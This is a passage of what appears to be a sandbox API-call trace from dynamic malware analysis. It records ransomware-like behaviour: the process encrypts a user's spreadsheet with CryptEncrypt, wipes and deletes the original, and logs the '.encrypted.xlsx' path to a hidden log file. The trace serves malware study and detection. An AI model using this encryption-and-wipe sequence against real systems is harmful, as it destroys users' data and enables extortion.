0x11 [0032.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.616] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x967558*, pdwDataLen=0x6ae220*=0x61b4, dwBufLen=0x61c0 | out: pbData=0x967558*, pdwDataLen=0x6ae220*=0x61c0) returned 1 [0032.617] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.623] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.623] CryptDestroyKey (hKey=0x7c2280) returned 1 [0032.623] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.624] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.624] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.624] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0032.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.624] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0032.625] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f24930, ftCreationTime.dwHighDateTime=0x1d577da, ftLastAccessTime.dwLowDateTime=0x228bf7c0, ftLastAccessTime.dwHighDateTime=0x1d5a79d, ftLastWriteTime.dwLowDateTime=0x228bf7c0, ftLastWriteTime.dwHighDateTime=0x1d5a79d, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3xhPX7.xlsx", cAlternateFileName="3XHPX7~1.XLS")) returned 0x7c2240 [0032.625] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.625] CharLowerBuffW (in: lpsz="byte[25012]", cchLength=0xb | out: lpsz="byte[25012]") returned 0xb [0032.625] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.626] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.626] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.626] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.627] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.627] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.627] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3xhpx7.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0032.628] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.628] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.628] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.628] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.628] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.628] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.629] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx", lpFilePart=0x0) returned 0x33 [0032.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f24930, ftCreationTime.dwHighDateTime=0x1d577da, ftLastAccessTime.dwLowDateTime=0x228bf7c0, ftLastAccessTime.dwHighDateTime=0x1d5a79d, ftLastWriteTime.dwLowDateTime=0x1355fb20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3xhPX7.xlsx", cAlternateFileName="3XHPX7~1.XLS")) returned 0x7c2240 [0032.629] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3xhpx7.xlsx")) returned 1 [0032.631] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f24930, ftCreationTime.dwHighDateTime=0x1d577da, ftLastAccessTime.dwLowDateTime=0x228bf7c0, ftLastAccessTime.dwHighDateTime=0x1d5a79d, ftLastWriteTime.dwLowDateTime=0x1355fb20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="3xhPX7.xlsx", cAlternateFileName="3XHPX7~1.XLS")) returned 0 [0032.631] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.631] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.631] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.631] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.631] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.631] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.632] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.632] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.632] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.632] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.632] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.632] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.632] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.632] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.633] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.633] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xd06, lpOverlapped=0x0) returned 1 [0032.633] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.633] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xd06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.633] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.encrypted.xlsx\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0032.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.encrypted.xlsx\r\n", cchWideChar=64, lpMultiByteStr=0x7ab380, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3xhPX7.encrypted.xlsx\r\n", lpUsedDefaultChar=0x0) returned 64 [0032.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.633] WriteFile (in: hFile=0x128, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3f, lpOverlapped=0x0) returned 1 [0032.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.633] CloseHandle (hObject=0x128) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 